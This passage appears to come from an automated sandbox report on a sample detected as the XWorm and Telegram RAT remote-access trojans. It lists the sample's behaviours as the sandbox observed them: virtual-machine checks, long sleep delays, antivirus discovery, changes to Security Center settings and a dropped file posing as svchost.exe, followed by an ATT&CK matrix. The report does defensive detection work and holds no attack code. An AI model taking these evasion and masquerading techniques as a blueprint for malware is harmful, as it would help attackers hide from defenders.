                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeMemory allocated: BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeMemory allocated: 1A8A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1A940000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 32A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1B2A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWindow / User API: threadDelayed 1599Jump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWindow / User API: threadDelayed 8237Jump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe TID: 7496Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe TID: 7508Thread sleep count: 1599 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exe TID: 7508Thread sleep count: 8237 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7608Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7808Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF664000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF681000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: yF21ypxRB7.exe, 00000000.00000002.3704179728.000000001B938000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                    Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF664000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000Ad
                    Source: svchost.exe, 00000005.00000002.3700396624.000001EDEF602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                    Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF664000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: svchost.exe, 00000005.00000002.3701142771.000001EDEF68E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000005.00000002.3700647003.000001EDEF62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000005.00000002.3700765508.000001EDEF64D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000007.00000002.3700643698.000001FE6DA31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeQueries volume information: C:\Users\user\Desktop\yF21ypxRB7.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Changes security center settings (notifications, updates, antivirus, firewall)
                    Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
                    Source: svchost.exe, 00000006.00000002.3701472363.0000011719502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                    Source: yF21ypxRB7.exe, 00000000.00000002.3705285429.000000001C5E0000.00000004.00000020.00020000.00000000.sdmp, yF21ypxRB7.exe, 00000000.00000002.3704179728.000000001B9DE000.00000004.00000020.00020000.00000000.sdmp, yF21ypxRB7.exe, 00000000.00000002.3704179728.000000001B938000.00000004.00000020.00020000.00000000.sdmp, yF21ypxRB7.exe, 00000000.00000002.3700338414.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3701472363.0000011719502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\yF21ypxRB7.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: Process Memory Space: yF21ypxRB7.exe PID: 6312, type: MEMORYSTR
                    Yara detected XWorm
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: yF21ypxRB7.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: yF21ypxRB7.exe PID: 6312, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: Process Memory Space: yF21ypxRB7.exe PID: 6312, type: MEMORYSTR
                    Yara detected XWorm
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: yF21ypxRB7.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: yF21ypxRB7.exe PID: 6312, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Windows Management Instrumentation                    		1
                    Windows Service                    		1
                    Windows Service                    		11
                    Masquerading                    		1
                    Input Capture                    		241
                    Security Software Discovery                    		Remote Services1
                    Input Capture                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job21
                    Registry Run Keys / Startup Folder                    		1
                    Process Injection                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    DLL Side-Loading                    		21
                    Registry Run Keys / Startup Folder                    		151
                    Virtualization/Sandbox Evasion                    		Security Account Manager151
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading                    		1
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture1
